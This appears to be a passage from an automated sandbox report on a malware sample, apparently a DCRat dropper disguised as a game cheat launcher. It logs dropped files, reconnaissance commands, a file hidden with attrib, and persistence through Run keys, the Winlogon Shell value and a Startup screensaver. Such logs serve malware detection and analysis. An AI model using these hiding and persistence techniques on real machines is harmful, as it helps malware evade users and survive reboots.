    Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: mswsock.dll
    Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: dnsapi.dll
    Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: rasadhlp.dll
    Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: fwpuclnt.dll
    Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: msasn1.dll
    Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: kernel.appcore.dll
    Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: avicap32.dll
    Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: msvfw32.dll
    Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: winmm.dll
    Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: winmm.dll
    Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: uxtheme.dll
    Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: dciman32.dll
    Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: winmmbase.dll
    Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: mmdevapi.dll
    Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: devobj.dll
    Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: ksuser.dll
    Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: avrt.dll
    Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: audioses.dll
    Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: powrprof.dll
    Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: umpdc.dll
    Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: msacm32.dll
    Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: midimap.dll
    Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: dpapi.dll
    Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: cryptbase.dll
    Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
    Source: C:\Users\user\Desktop\QIjBj1l8We.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
    Source: C:\agentInto\fontsessionruntime.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Resource\Font\seCeUYjhGIFplo.exe
    Source: C:\agentInto\fontsessionruntime.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Resource\Font\669269bdeab909
    Source: C:\agentInto\fontsessionruntime.exeDirectory created: C:\Program Files\Windows Mail\StartMenuExperienceHost.exe
    Source: C:\agentInto\fontsessionruntime.exeDirectory created: C:\Program Files\Windows Mail\55b276f4edf653
    Source: QIjBj1l8We.exeStatic file information: File size 12016128 > 1048576
    Source: QIjBj1l8We.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0xb73c00
    Source: Binary string: C:\src\vcpkg\buildtrees\curl\x64-windows-rel\lib\libcurl.pdb source: libcurl.dll.14.dr
    Source: Binary string: W.PDB/ source: x12.exe.0.dr
    Source: SolaraBootstrapper.exe.10.drStatic PE information: 0x9EA529E4 [Tue May 5 20:04:52 2054 UTC]
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gkfhm5n3\gkfhm5n3.cmdline"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gkfhm5n3\gkfhm5n3.cmdline"
    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeFile created: C:\agentInto\__tmp_rar_sfx_access_check_4896687
    Source: DCRatBuild.exe.10.drStatic PE information: section name: .didat
    Source: Built.exe.10.drStatic PE information: section name: _RDATA
    Source: VCRUNTIME140.dll.13.drStatic PE information: section name: fothk
    Source: VCRUNTIME140.dll.13.drStatic PE information: section name: _RDATA
    Source: libffi-8.dll.13.drStatic PE information: section name: UPX2
    Source: msvcp140.dll.14.drStatic PE information: section name: .didat
    Source: vcruntime140.dll.14.drStatic PE information: section name: _RDATA
    Source: WebView2Loader.dll.14.drStatic PE information: section name: .00cfg
    Source: WebView2Loader.dll.14.drStatic PE information: section name: .gehcont
    Source: WebView2Loader.dll.14.drStatic PE information: section name: _RDATA
    Source: ws2_32.dll.14.drStatic PE information: section name: .wpp_sf
    Source: ws2_32.dll.14.drStatic PE information: section name: .didat
    Source: zlib1.dll.14.drStatic PE information: section name: .xdata
    Source: initial sampleStatic PE information: section name: UPX0
    Source: initial sampleStatic PE information: section name: UPX1
    Source: initial sampleStatic PE information: section name: UPX0
    Source: initial sampleStatic PE information: section name: UPX1
    Source: initial sampleStatic PE information: section name: UPX0
    Source: initial sampleStatic PE information: section name: UPX1
    Source: initial sampleStatic PE information: section name: UPX0
    Source: initial sampleStatic PE information: section name: UPX1
    Source: initial sampleStatic PE information: section name: UPX0
    Source: initial sampleStatic PE information: section name: UPX1
    Source: initial sampleStatic PE information: section name: UPX0
    Source: initial sampleStatic PE information: section name: UPX1
    Source: initial sampleStatic PE information: section name: UPX0
    Source: initial sampleStatic PE information: section name: UPX1
    Source: initial sampleStatic PE information: section name: UPX0
    Source: initial sampleStatic PE information: section name: UPX1
    Source: initial sampleStatic PE information: section name: UPX0
    Source: initial sampleStatic PE information: section name: UPX1
    Source: initial sampleStatic PE information: section name: UPX0
    Source: initial sampleStatic PE information: section name: UPX1
    Source: initial sampleStatic PE information: section name: UPX0
    Source: initial sampleStatic PE information: section name: UPX1
    Source: initial sampleStatic PE information: section name: UPX0
    Source: initial sampleStatic PE information: section name: UPX1
    Source: initial sampleStatic PE information: section name: UPX0
    Source: initial sampleStatic PE information: section name: UPX1
    Source: initial sampleStatic PE information: section name: UPX0
    Source: initial sampleStatic PE information: section name: UPX1
    Source: initial sampleStatic PE information: section name: UPX0
    Source: initial sampleStatic PE information: section name: UPX1
    Source: initial sampleStatic PE information: section name: UPX0
    Source: initial sampleStatic PE information: section name: UPX1

    Persistence and Installation Behavior

    barindex
    Source: C:\agentInto\fontsessionruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
    Source: C:\agentInto\fontsessionruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
    Source: C:\agentInto\fontsessionruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
    Source: C:\agentInto\fontsessionruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
    Source: C:\agentInto\fontsessionruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
    Source: C:\agentInto\fontsessionruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
    Source: C:\agentInto\fontsessionruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
    Source: C:\agentInto\fontsessionruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
    Source: C:\agentInto\fontsessionruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
    Source: C:\agentInto\fontsessionruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
    Source: C:\agentInto\fontsessionruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
    Source: C:\agentInto\fontsessionruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
    Source: C:\agentInto\fontsessionruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
    Source: C:\agentInto\fontsessionruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
    Source: C:\agentInto\fontsessionruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
    Source: C:\agentInto\fontsessionruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
    Source: C:\agentInto\fontsessionruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
    Source: C:\agentInto\fontsessionruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
    Source: C:\agentInto\fontsessionruntime.exeFile written: C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\tasklist.exe
    Source: C:\agentInto\fontsessionruntime.exeFile written: C:\Program Files\Adobe\Acrobat DC\Resource\Font\seCeUYjhGIFplo.exe
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\Temp\Built.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
    Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
    Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
    Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
    Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
    Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
    Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
    Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
    Source: C:\agentInto\fontsessionruntime.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\tasklist.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeFile created: C:\Users\user\AppData\Local\Temp\Solara.Dir\msvcp140.dllJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeFile created: C:\Users\user\AppData\Local\Temp\Solara.Dir\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeFile created: C:\Users\user\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.dllJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeFile created: C:\Users\user\AppData\Local\Temp\Solara.Dir\Newtonsoft.Json.dllJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeFile created: C:\Users\user\AppData\Local\Temp\Solara.Dir\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI66162\_ssl.pydJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeFile created: C:\Users\user\AppData\Local\Temp\Solara.Dir\cpr.dllJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI66162\_lzma.pydJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\x8.exeFile created: C:\Users\user\AppData\Local\Temp\x7.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\x9.exeFile created: C:\Users\user\AppData\Local\Temp\x8.exeJump to dropped file
    Source: C:\agentInto\fontsessionruntime.exeFile created: C:\Recovery\seCeUYjhGIFplo.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeFile created: C:\Users\user\AppData\Local\Temp\Solara.Dir\Microsoft.Web.WebView2.Wpf.dllJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeFile created: C:\agentInto\fontsessionruntime.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeFile created: C:\Users\user\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeFile created: C:\Users\user\AppData\Local\Temp\Solara.Dir\Microsoft.Web.WebView2.WinForms.dllJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeFile created: C:\Users\user\AppData\Local\Temp\Solara.Dir\Microsoft.Web.WebView2.Core.dllJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\x10.exeFile created: C:\Users\user\AppData\Local\Temp\x9.exeJump to dropped file
    Source: C:\agentInto\fontsessionruntime.exeFile created: C:\Program Files\Windows Mail\StartMenuExperienceHost.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI66162\_bz2.pydJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\CheatLauncherV2.exeFile created: C:\Users\user\AppData\Local\Temp\Built.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\CheatLauncherV2.exeFile created: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI66162\_hashlib.pydJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeFile created: C:\Users\user\AppData\Local\Temp\Solara.Dir\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeFile created: C:\Users\user\AppData\Local\Temp\Solara.Dir\vcruntime140.dllJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI66162\python312.dllJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI66162\sqlite3.dllJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeFile created: C:\Users\user\AppData\Local\Temp\Solara.Dir\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\x11.exeFile created: C:\Users\user\AppData\Local\Temp\x10.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeFile created: C:\Users\user\AppData\Local\Temp\Solara.Dir\libcurl.dllJump to dropped file
    Source: C:\agentInto\fontsessionruntime.exeFile created: C:\Program Files\Adobe\Acrobat DC\Resource\Font\seCeUYjhGIFplo.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeFile created: C:\Users\user\AppData\Local\Temp\Solara.Dir\ws2_32.dllJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\x4.exeFile created: C:\Users\user\AppData\Local\Temp\CheatLauncherV2.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeFile created: C:\Users\user\AppData\Local\Temp\Solara.Dir\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI66162\_sqlite3.pydJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeFile created: C:\Users\user\AppData\Local\Temp\Solara.Dir\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\CheatLauncherV2.exeFile created: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI66162\_decimal.pydJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI66162\select.pydJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\x5.exeFile created: C:\Users\user\AppData\Local\Temp\x4.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI66162\rar.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeFile created: C:\Users\user\AppData\Local\Temp\Solara.Dir\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeFile created: C:\Users\user\AppData\Local\Temp\Solara.Dir\zlib1.dllJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI66162\_queue.pydJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeFile created: C:\Users\user\AppData\Local\Temp\Solara.Dir\WebView2Loader.dllJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\x6.exeFile created: C:\Users\user\AppData\Local\Temp\x5.exeJump to dropped file
    Source: C:\agentInto\fontsessionruntime.exeFile created: C:\Recovery\fontdrvhost.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI66162\VCRUNTIME140.dllJump to dropped file
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\gkfhm5n3\gkfhm5n3.dllJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI66162\libssl-3.dllJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeFile created: C:\Users\user\AppData\Local\Temp\Solara.Dir\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI66162\libcrypto-3.dllJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeFile created: C:\Users\user\AppData\Local\Temp\Solara.Dir\Wpf.Ui.dllJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI66162\_socket.pydJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI66162\unicodedata.pydJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\x12.exeFile created: C:\Users\user\AppData\Local\Temp\x11.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI66162\_ctypes.pydJump to dropped file
    Source: C:\Users\user\Desktop\QIjBj1l8We.exeFile created: C:\Users\user\AppData\Local\Temp\x12.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\x7.exeFile created: C:\Users\user\AppData\Local\Temp\x6.exeJump to dropped file
    Source: C:\agentInto\fontsessionruntime.exeFile created: C:\Windows\ShellComponents\tasklist.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI66162\libffi-8.dllJump to dropped file
    Source: C:\agentInto\fontsessionruntime.exeFile created: C:\Windows\ShellComponents\tasklist.exeJump to dropped file

    Boot Survival

    barindex
    Source: C:\agentInto\fontsessionruntime.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tasklist
    Source: C:\agentInto\fontsessionruntime.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
    Source: C:\agentInto\fontsessionruntime.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
    Source: C:\agentInto\fontsessionruntime.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
    Source: C:\agentInto\fontsessionruntime.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
    Source: C:\agentInto\fontsessionruntime.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
    Source: C:\agentInto\fontsessionruntime.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
    Source: C:\agentInto\fontsessionruntime.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run StartMenuExperienceHost
    Source: C:\agentInto\fontsessionruntime.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run seCeUYjhGIFplo
    Source: C:\agentInto\fontsessionruntime.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fontdrvhost
    Source: C:\agentInto\fontsessionruntime.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tasklist
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr
    Source: C:\agentInto\fontsessionruntime.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tasklist
    Source: C:\agentInto\fontsessionruntime.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tasklist
